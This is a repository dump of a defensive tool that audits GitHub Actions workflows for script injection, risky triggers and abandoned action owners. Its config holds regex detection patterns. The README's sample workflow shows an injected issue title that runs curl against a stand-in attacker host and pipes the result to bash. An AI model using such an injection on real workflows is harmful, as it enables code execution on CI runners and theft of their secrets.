├── requirements.txt
├── static
│   └── TinderSecurity.png
├── scan_config.json
├── lib
│   └── logger.py
├── action_auditor.py
├── README.md
├── LICENSE.md
├── query_data.py
├── main.py
├── .gitignore
├── workflow.py
├── github_wrapper.py
└── auditor.py

--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
PyYAML==6.0
requests==2.26.0

--------------------------------------------------------------------------------
/static/TinderSecurity.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TinderSec/gh-workflow-auditor/HEAD/static/TinderSecurity.png

--------------------------------------------------------------------------------
/scan_config.json:
--------------------------------------------------------------------------------
{
    "rce_risks":{
        "unsafe_inputs":{
            "user_input_body_title":"\\${{\\s*github.event.(.*).(body|title)\\s*}}",
            "malicious_commit_message":"\\${{\\s*(.*).head_commit.message\\s*}}",
            "malicious_input":"\\${{\\s*(.*)github.event.review(.*)\\s*}}",
            "environ_regex":"\\${{\\s*env.[A-Za-z0-9_-]*\\s*}}",
            "malicious_author":"\\${{\\s*github.event.(.*).author.(name|email)\\s*}}"
        },
        "malicious_commits":{
            "malicious_commit_referenced":"\\${{\\s*github.pull_request.head(.*)\\s*}}",
            "malicious_pull_request_event":"\\${{\\s*(.*)github.event.pull_request.head(.*)\\s*}}"
        }
    },
    "secrets":"\\${{\\s*secrets\\.[A-Za-z-_0-9]*\\s*}}",
    "risky_events":["pull_request_target","issues","issue_comment"]
}
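Each pattern above is compiled with `re` and run against workflow text by workflow.py. A minimal sketch of how one pattern flags an attacker-controlled GitHub context expression (the regex is the `user_input_body_title` entry after JSON unescaping; the sample step is hypothetical):

```python
import re

# "user_input_body_title" from scan_config.json, after JSON unescaping.
user_input_body_title = re.compile(r"\${{\s*github.event.(.*).(body|title)\s*}}")

# Hypothetical run step that interpolates an issue title straight into a
# shell command -- the classic GitHub Actions script-injection anti-pattern.
step = 'echo "New issue: ${{ github.event.issue.title }}"'

match = user_input_body_title.search(step)
print(match.group() if match else "no finding")
# -> ${{ github.event.issue.title }}
```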
--------------------------------------------------------------------------------
/lib/logger.py:
--------------------------------------------------------------------------------
import logging

def parse_log_level_input(level_name):
    if level_name == 'debug':
        level = logging.DEBUG
    elif level_name == 'info':
        level = logging.INFO
    elif level_name == 'warning':
        level = logging.WARNING
    elif level_name == 'error':
        level = logging.ERROR
    elif level_name == 'critical':
        level = logging.CRITICAL
    else:
        level = logging.INFO  # fall back to INFO on unrecognized input

    return level

def build_logger(log_level='info'):
    log_format = logging.Formatter('%(levelname)s: %(message)s')
    logger = logging.getLogger('Audit Log')
    log_level = parse_log_level_input(log_level)
    logger.setLevel(log_level)

    channel = logging.StreamHandler()
    channel.setFormatter(log_format)

    log_file = logging.FileHandler('scan.log')

    logger.addHandler(channel)
    logger.addHandler(log_file)
    return logger

--------------------------------------------------------------------------------
/action_auditor.py:
--------------------------------------------------------------------------------
from pathlib import Path
import re

def read_actions_file():
    array_of_usernames = []
    with open('actions.txt','r') as lines:
        for line in lines:
            username = line.split('/')[0]
            username_regex = re.compile("[A-Za-z0-9-]*")
            if username_regex.fullmatch(username):
                if username not in array_of_usernames:
                    array_of_usernames.append(username)
    return array_of_usernames

class ActionAuditor:
    def __init__(self, gh_wrapper, logger):
        self.gh = gh_wrapper
        self.logger = logger

    def check_usernames(self, username_list):
        for username in username_list:
            account_exists = self.gh.stale_checker(username=username)
            if not account_exists:
                self.logger.warning(f"Security Issue: Supply chain. {username} no longer resolves to a GitHub account but is referenced in workflows. Try registering the username at https://github.com to confirm it can be claimed.")

    def action_audit(self):
        if Path('actions.txt').exists():
            usernames = read_actions_file()
            self.check_usernames(usernames)
            Path('actions.txt').unlink()
        else:
            self.logger.info("No actions.txt file to scan. Supply chain scan complete.")

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
![TinderSecurity](static/TinderSecurity.png)

# GitHub Workflow Auditor
Workflow auditing tool to identify security issues in GitHub workflows.

# Usage

```
usage: main.py [-h] [--type {repo,org,user}] [--log-level {debug,info,warning,error,critical}] input

Identify vulnerabilities in GitHub Actions workflow

positional arguments:
  input                 User/Org Name or Repo name (owner/repo).

optional arguments:
  -h, --help            show this help message and exit
  --type {repo,org,user}
                        Type of entity that is being scanned.
  --log-level {debug,info,warning,error,critical}
                        Log level for output
```

Examples:
* org - `python3 main.py --type org google`
* user - `python3 main.py --type user test_user`
* repo - `python3 main.py --type repo TinderSec/gh-workflow-auditor`

# Setup

GitHub Workflow Auditor uses GitHub's GraphQL endpoint, so an API token is required. The program reads it from the `PAT` environment variable. You can generate a basic PAT token (https://github.com/settings/tokens/new) without any scope. Note that you may have to "Configure SSO" for the token to be usable on some organizations.

```
export PAT=ghp_YOUR_TOKEN
```

# About
GitHub Workflow Auditor identifies vulnerabilities in GitHub workflows. It does so by scanning workflow files for anti-patterns such as ingesting user input in an unsafe manner or using malicious commits in the build process. The tool supports scanning individual repositories or all accessible repositories of a user or organization. The output of the scan is saved to `scan.log`.
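# Example finding

A hypothetical workflow (not taken from a real repository) of the kind the scanner flags: the run step interpolates attacker-controlled issue text directly into a shell command.

```yaml
name: issue-greeter
on: issue_comment
jobs:
  greet:
    runs-on: ubuntu-latest
    steps:
      # ${{ github.event.issue.title }} is expanded before the shell runs, so
      # a title such as `"; curl https://attacker.example/x.sh | bash #` would
      # execute arbitrary code on the runner.
      - run: echo "Triaging ${{ github.event.issue.title }}"
```

The `user_input_body_title` pattern in `scan_config.json` matches the `${{ github.event.issue.title }}` expression, so the run step above would be reported as a potential RCE.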
--------------------------------------------------------------------------------
/LICENSE.md:
--------------------------------------------------------------------------------
Copyright 2022 Match Group, LLC

The copyright holder grants you permission to use or redistribute this software in source and binary forms, with or without modification, conditioned on your acceptance of, and adherence to, the following conditions:

1. Redistributions of source code, whether or not modified, must retain the above copyright notice, this list of conditions, and the following disclaimer. If modified, the source code must identify the modifications (identification in general terms is acceptable).
2. Redistributions in binary or application form must reproduce the above copyright notice, this list of conditions, and the following disclaimer in the documentation or other materials provided with the binary or application.
3. You may not use the name of the copyright holder nor the names of the contributors to endorse or promote products derived from this software without specific prior written permission.
4. You may use this software only to scan and assess your own software and systems and may not use it for any malicious or illegal purpose. You may disclose any potential vulnerabilities you detect with this software only to the developer of the software in which you detect the potential vulnerability.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ALL EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND NON INFRINGEMENT ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. YOU AGREE TO INDEMNIFY AND HOLD HARMLESS THE COPYRIGHT HOLDER AND ALL CONTRIBUTORS AGAINST ANY CLAIMS THAT ARISE BASED ON YOUR USE, MODIFICATION, OR REDISTRIBUTION OF THIS SOFTWARE.

--------------------------------------------------------------------------------
/query_data.py:
--------------------------------------------------------------------------------
def return_query(query_type, name, after=None):
    if query_type == 'repository':
        owner, name = name.split('/')
        return f"""query {{
  repository(owner: "{owner}", name: "{name}") {{
    nameWithOwner
    object(expression: "HEAD:.github/workflows/") {{
      ... on Tree {{
        entries {{
          name
          lineCount
          object {{
            ... on Blob {{
              text
            }}
          }}
        }}
      }}
    }}
  }}
}}"""
    else:
        after_query = f",after:\"{after}\"" if after else ""
        return f"""query {{
  {query_type}(login: "{name}") {{
    repositories(first: 100 {after_query}) {{
      edges {{
        node {{
          nameWithOwner
          object(expression: "HEAD:.github/workflows/") {{
            ... on Tree {{
              entries {{
                name
                lineCount
                object {{
                  ... on Blob {{
                    text
                  }}
                }}
              }}
            }}
          }}
        }}
      }}
      pageInfo {{
        startCursor
        hasNextPage
        endCursor
      }}
    }}
  }}
}}"""

def validation_query(username, guess_type):
    return f"""query {{
  {guess_type}(login: "{username}") {{
    repositories(first: 1) {{
      edges {{
        node {{
          nameWithOwner
        }}
      }}
    }}
  }}
}}"""
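A short sketch of how these query builders are driven (illustrative only; the cursor string below is a hypothetical `pageInfo.endCursor` value):

```python
from query_data import return_query, validation_query

# Single repository: return_query splits "owner/name" itself.
repo_query = return_query('repository', 'TinderSec/gh-workflow-auditor')

# Paginated listing: GHWrapper feeds pageInfo.endCursor from one response
# into `after` to request the next batch of 100 repositories.
page_one = return_query('organization', 'TinderSec')
page_two = return_query('organization', 'TinderSec', after='Y3Vyc29yOjEwMA==')

# Stale-account check: does the login still resolve to a user or organization?
user_check = validation_query('octocat', 'user')
```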
--------------------------------------------------------------------------------
/main.py:
--------------------------------------------------------------------------------
import argparse

# Local imports
from auditor import content_analyzer
from action_auditor import ActionAuditor
from github_wrapper import GHWrapper
from lib.logger import build_logger


"""
Input:
    repo_workflow - list of workflow dictionaries (name, content)
    logger - configured logger
Output:
    scan result (if any) in scan.log file.
Summary:
    For each workflow dictionary (name, content) this function
    calls content_analyzer to audit the workflow for any
    potential vulnerabilities.
"""
def repo_analysis(repo_workflow, logger):
    for workflow in repo_workflow:
        workflow_name = workflow['name']
        workflow_content = workflow['content']
        logger.info(f">> Scanning: {workflow_name}")
        content_analyzer(content=workflow_content, logger=logger)  # logs any security issues it finds

def main():
    # Supported user-provided arguments: type, log level, and scan target.
    parser = argparse.ArgumentParser(description='Identify vulnerabilities in GitHub Actions workflow')
    parser.add_argument('--type', choices=['repo','org','user'],
                        help='Type of entity that is being scanned.')
    parser.add_argument('--log-level', choices=['debug','info','warning','error','critical'],
                        default='info', help='Log level for output')
    parser.add_argument('input', help='Org, user or repo name (owner/name)')
    args = parser.parse_args()

    target_type = args.type  # repo, org, or user
    target_input = args.input  # repo name (owner/name), or a username for org/user
    log_level = args.log_level

    logger = build_logger(log_level)
    gh = GHWrapper(logger)

    if target_type == 'repo':
        repos = gh.get_single_repo(repo_name=target_input)
    else:
        count, repos = gh.get_multiple_repos(target_name=target_input,
                                             target_type=target_type)
        logger.info(f"Metric: Scanning total {count} repos")

    for repo_dict in repos:
        logger.info(f"> Starting audit of {repo_dict}")
        repo_workflows = repos[repo_dict]
        repo_analysis(repo_workflows, logger)

    logger.info("> Checking for supply chain attacks.")
    action_auditor = ActionAuditor(gh, logger)
    action_auditor.action_audit()

main()

--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class

# C extensions
*.so

# Distribution / packaging
.Python
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib64/
parts/
sdist/
var/
wheels/
pip-wheel-metadata/
share/python-wheels/
*.egg-info/
.installed.cfg
*.egg
MANIFEST

# PyInstaller
#  Usually these files are written by a python script from a template
#  before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec

# Installer logs
pip-log.txt
pip-delete-this-directory.txt

# Unit test / coverage reports
htmlcov/
.tox/
.nox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*.cover
*.py,cover
.hypothesis/
.pytest_cache/

# Translations
*.mo
*.pot

# Django stuff:
*.log
local_settings.py
db.sqlite3
db.sqlite3-journal

# Flask stuff:
instance/
.webassets-cache

# Scrapy stuff:
.scrapy

# Sphinx documentation
docs/_build/

# PyBuilder
target/

# Jupyter Notebook
.ipynb_checkpoints

# IPython
profile_default/
ipython_config.py

# pyenv
.python-version

# pipenv
#   According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
#   However, in case of collaboration, if having platform-specific dependencies or dependencies
#   having no cross-platform support, pipenv may install dependencies that don't work, or not
#   install all needed dependencies.
#Pipfile.lock

# PEP 582; used by e.g. github.com/David-OConnor/pyflow
__pypackages__/

# Celery stuff
celerybeat-schedule
celerybeat.pid

# SageMath parsed files
*.sage.py

# Environments
.env
.venv
env/
venv/
ENV/
env.bak/
venv.bak/

# Spyder project settings
.spyderproject
.spyproject

# Rope project settings
.ropeproject

# mkdocs documentation
/site

# mypy
.mypy_cache/
.dmypy.json
dmypy.json

# Pyre type checker
.pyre/
*.sh
.DS_Store

--------------------------------------------------------------------------------
/workflow.py:
--------------------------------------------------------------------------------
import json
import re
import yaml

class WorkflowParser():
    def __init__(self, yaml_content: str):
        try:
            self.parsed_content = yaml.safe_load(yaml_content)  # safe_load -- we don't want a vulnerability ;)
        except yaml.YAMLError:
            self.parsed_content = {'failed': True}

    def get_event_triggers(self) -> list:
        # Check what starts a workflow. Can be a list, a dict, or a scalar.
        if self.parsed_content.get(True, None):
            if isinstance(self.parsed_content[True], list):
                return self.parsed_content[True]
            elif isinstance(self.parsed_content[True], dict):
                return list(self.parsed_content[True].keys())
            else:
                return [self.parsed_content[True]]

    def get_jobs(self) -> dict:
        return self.parsed_content.get('jobs', None)

    def get_jobs_count(self) -> int:
        # How many jobs execute. Jobs run on their own individual runners.
        return len(self.parsed_content['jobs'].keys())

    def get_steps_for_jobs(self, job_dict: dict) -> list:
        # Return the list of steps in a given job dictionary.
        return job_dict.get('steps', None)

    def analyze_step(self, step: dict) -> tuple:
        actions = step.get('uses', None)
        run_command = step.get('run', None)
        with_input = step.get('with', None)
        step_environ = step.get('env', None)  # environment variables can also be defined per step
        return actions, run_command, with_input, step_environ
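
# Illustrative note (not part of the original tool): because PyYAML implements
# YAML 1.1, the bare workflow key `on` is parsed as the boolean True, which is
# why get_event_triggers() above looks up self.parsed_content[True] rather
# than the string 'on'. For example:
#
#   yaml.safe_load("on: [pull_request_target]")
#   # -> {True: ['pull_request_target']}
#
#   WorkflowParser("on: [pull_request_target]").get_event_triggers()
#   # -> ['pull_request_target']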

# Analyze various aspects of a workflow to identify whether it is risky.
class WorkflowVulnAudit():
    def __init__(self):
        # Compile the scan-config regexes up front.
        self.unsafe_input = {}
        self.malicious_commits = {}
        with open('scan_config.json', 'r') as scan_file:
            scan_config = json.loads(scan_file.read())
        self.triggers = scan_config['risky_events']
        self.secrets = re.compile(scan_config['secrets'])
        for risky_input in scan_config['rce_risks']['unsafe_inputs']:
            self.unsafe_input[risky_input] = re.compile(scan_config['rce_risks']['unsafe_inputs'][risky_input])
        for commit_to_watch in scan_config['rce_risks']['malicious_commits']:
            self.malicious_commits[commit_to_watch] = re.compile(scan_config['rce_risks']['malicious_commits'][commit_to_watch])
        self.vulnerable = {'vulnerable': True}

    def risky_command(self, command_string) -> dict:
        found_matches = {}
        for regex in self.unsafe_input:
            if matches := self.unsafe_input[regex].finditer(command_string):
                matched_commands = [command.group() for command in matches]
                if matched_commands:
                    found_matches[regex] = matched_commands
        return found_matches

    def risky_trigger(self, trigger_name: str) -> bool:
        return trigger_name in self.triggers

    # Find and return every secret used in this workflow. If there is an RCE,
    # these secrets can be pulled.
    def get_secrets(self, full_yaml: str) -> list:
        found_matches = []
        if matches := self.secrets.findall(full_yaml):
            for match in matches:
                if match not in found_matches:
                    found_matches.append(match)
        return found_matches

    def risky_commit(self, referenced) -> dict:
        found_matches = {}
        for regex in self.malicious_commits:
            if matches := self.malicious_commits[regex].finditer(referenced):
                matched_commits = [commit.group() for commit in matches]
                if matched_commits:
                    found_matches[regex] = matched_commits
        return found_matches
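
# A minimal usage sketch (not part of the original tool; assumes
# scan_config.json is in the working directory):
if __name__ == '__main__':
    auditor = WorkflowVulnAudit()
    finding = auditor.risky_command('echo "${{ github.event.issue.title }}"')
    print(finding)
    # -> {'user_input_body_title': ['${{ github.event.issue.title }}']}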
Exiting.") 26 | sys.exit() 27 | 28 | def validate_token(self): 29 | header = {"Authorization":f"token {self.token}"} 30 | url = "https://api.github.com" 31 | validation_req = requests.get(url=url, headers=header) 32 | valid_status = True 33 | if validation_req.status_code == 401: 34 | valid_status = False 35 | else: 36 | valid_status = True 37 | return valid_status 38 | 39 | def call_graphql(self, query): 40 | headers = {'Authorization':f"Bearer {self.token}", 41 | 'Content-Type':'application/json'} 42 | query_request = requests.post(url='https://api.github.com/graphql', 43 | json = {'query':query}, 44 | headers = headers) 45 | if query_request.status_code == 200: 46 | return query_request.json() 47 | else: 48 | message = query_request.text 49 | logger.error(f"GitHub GraphQL Query failed: {message}") 50 | sys.exit(1) 51 | 52 | def repo_node_parser(self,repo_node): 53 | workflow_object = repo_node['object'] 54 | repo_workflows = [] 55 | if workflow_object: 56 | workflows = workflow_object['entries'] 57 | for workflow in workflows: 58 | workflow_name = workflow['name'] 59 | if workflow.get('object',None): 60 | workflow_text = workflow['object'].get('text',None) 61 | workflow_ext = workflow_name.split('.')[-1] 62 | if workflow_ext == "yml" or workflow_ext == "yaml": 63 | repo_workflows.append({'name':workflow_name,'content':workflow_text}) 64 | return repo_workflows 65 | 66 | def get_single_repo(self, repo_name): 67 | repos_all = {} 68 | repo_query = return_query('repository', 69 | repo_name) 70 | repos = self.call_graphql(repo_query) 71 | if repos.get('errors') is None: 72 | repo_node = repos['data']['repository'] 73 | repo_name = repo_node['nameWithOwner'] 74 | repo_workflows = self.repo_node_parser(repo_node) 75 | if repo_workflows: # this repo has workflows 76 | repos_all[repo_name] = repo_workflows 77 | else: 78 | self.logger.debug(f"Repo {repo_name} has no workflow.") 79 | return repos_all 80 | 81 | def get_multiple_repos(self,target_name,target_type='org'): 82 | self.logger.info(f"---- Getting repos for {target_name}----") 83 | repos_all = {} 84 | query_type = {'org':'organization','user':'user','repo':'repository'} 85 | try: 86 | next_cursor = None 87 | has_more = True # for pagination loop 88 | count = 0 89 | while has_more: 90 | query = return_query(query_type[target_type], 91 | target_name, next_cursor) 92 | repos = self.call_graphql(query) 93 | if repos.get('errors') is None: 94 | for repo in repos['data'][query_type[target_type]]['repositories']['edges']: 95 | repo_node = repo['node'] 96 | repo_name = repo_node['nameWithOwner'] 97 | repo_workflows = self.repo_node_parser(repo_node) 98 | if repo_workflows: 99 | repos_all[repo_name] = repo_workflows 100 | count += 1 101 | else: 102 | self.logger.debug(f"Repo {repo_name} has no workflow.") 103 | has_more = repos['data'][query_type[target_type]]['repositories']['pageInfo']['hasNextPage'] 104 | next_cursor = repos['data'][query_type[target_type]]['repositories']['pageInfo']['endCursor'] 105 | if has_more: 106 | logger.info("> Retrieve next batch of 100 repos.") 107 | else: 108 | self.logger.error(f"GraphQL response had error.") 109 | sys.exit(1) 110 | except Exception as repo_err: 111 | self.logger.debug(f"Error parsing data. 
--------------------------------------------------------------------------------
/auditor.py:
--------------------------------------------------------------------------------
from workflow import WorkflowParser, WorkflowVulnAudit

vuln_analyzer = WorkflowVulnAudit()

def risky_trigger_analysis(identified_triggers):
    return_triggers = []
    for trigger in identified_triggers:
        risky_or_not = vuln_analyzer.risky_trigger(trigger_name=trigger)
        if risky_or_not:
            return_triggers.append(trigger)
    return return_triggers


"""
Input:
    content - YAML content read from the workflow files.
    logger - configured logger
Output:
    scan result (if any) in scan.log file.
Summary:
    This is the critical part of the whole tool. It parses the
    YAML content to identify security issues. It does so by
    parsing the YAML into a dictionary and identifying keys such
    as event triggers, jobs, and steps. It then checks the
    identified key-value pairs against known risks through
    WorkflowParser and WorkflowVulnAudit.
"""
def content_analyzer(content, logger):
    risky_triggers = []
    all_actions = []
    commands = []
    environs = {}
    checked_action = []
    workflow_client = WorkflowParser(content)
    if workflow_client.parsed_content and not workflow_client.parsed_content.get('failed', None):  # sanity check that valid YAML was given
        event_triggers = workflow_client.get_event_triggers()  # identify what event(s) start the workflow
        secrets = vuln_analyzer.get_secrets(content)  # regex out every secret used in the workflow; this helps gauge impact
        all_jobs = workflow_client.get_jobs()  # all jobs in the workflow, stored as a dictionary

        counter = 1  # counter used to identify which job/step is vulnerable
        if secrets:
            logger.info(f">>> Secrets used in workflow: {','.join(secrets)}")

        # Retrieve and store all information needed to analyze a workflow run.
        if all_jobs:
            for job in all_jobs:
                steps = all_jobs[job].get('steps', None)
                if not steps:
                    steps = [all_jobs[job]]
                try:
                    environs.update(all_jobs[job].get('env', {}))
                except Exception:
                    logger.info(">> Environ variable is malformed")
                for step_number, step in enumerate(steps):
                    actions, run_command, with_input, step_environ = workflow_client.analyze_step(step)
                    if actions:
                        all_actions.append({f"Job{counter}.Step{step_number+1}": step})
                    if step_environ:
                        if isinstance(step_environ, str):
                            step_environ = {f"{step_number}{step}": step_environ}
                        environs.update(step_environ)
                    if run_command:
                        commands.append({f"Job{counter}.Step{step_number+1}": step})
                counter += 1

        # Start analyzing the retrieved information.
        try:
            # Analyze event triggers to see if they are user controlled.
            risky_triggers = risky_trigger_analysis(identified_triggers=event_triggers)

            # Analyze commands called by steps.
            for command in commands:
                for step_number, step_dict in command.items():
                    risky_command = vuln_analyzer.risky_command(command_string=step_dict['run'])
                    if risky_command:
                        for regex, matched_strings in risky_command.items():
                            if regex == 'environ_regex':  # not all environment variables are bad; check whether this one is user controlled
                                # Pull the key out of each matched string and check whether
                                # that environ variable stores any user-controlled input.
                                for environ_variable in matched_strings:
                                    environ_variable = environ_variable.strip('${{').strip('}}').split('.')[1].strip()
                                    # get environ value
                                    environ_var_value = environs.get(environ_variable, None)
                                    if environ_var_value:
                                        risky_env = vuln_analyzer.risky_command(command_string=environ_var_value)
                                        if risky_env and list(risky_env.keys())[0] != 'environ_regex':
                                            logger.warning(f">>> Security Issue: RCE detected with {regex} in {step_number}: ENV variable {environ_variable} is called through GitHub context and takes user input {environ_var_value}")
                            else:
                                logger.warning(f">>> Security Issue: RCE detected with {regex} in {step_number}: Usage of {','.join(matched_strings)} found.")

            # Some actions combined with triggers can be bad. Check for those cases.
            with open('actions.txt', 'a+') as action_storage:
                for action in all_actions:
                    for step_number, step_dict in action.items():
                        action_name = step_dict.get('uses', None)
                        action_storage.write(f"{action_name}\n")
                        if 'actions/checkout' in action_name:
                            # Check whether a specific ref is checked out.
                            if step_dict.get('with', None):
                                if step_dict['with'].get('ref', None):
                                    ref_value = step_dict['with'].get('ref')
                                    risky_commits = vuln_analyzer.risky_commit(referenced=ref_value)
                                    if risky_commits:
                                        if 'pull_request_target' in risky_triggers:
                                            logger.warning(f">>> Security Issue: Malicious pull request used in actions/checkout. Vulnerable step: {step_number}")
        except Exception as workflow_err:
            logger.info(f">>> Error parsing workflow. Error is {str(workflow_err)}")
--------------------------------------------------------------------------------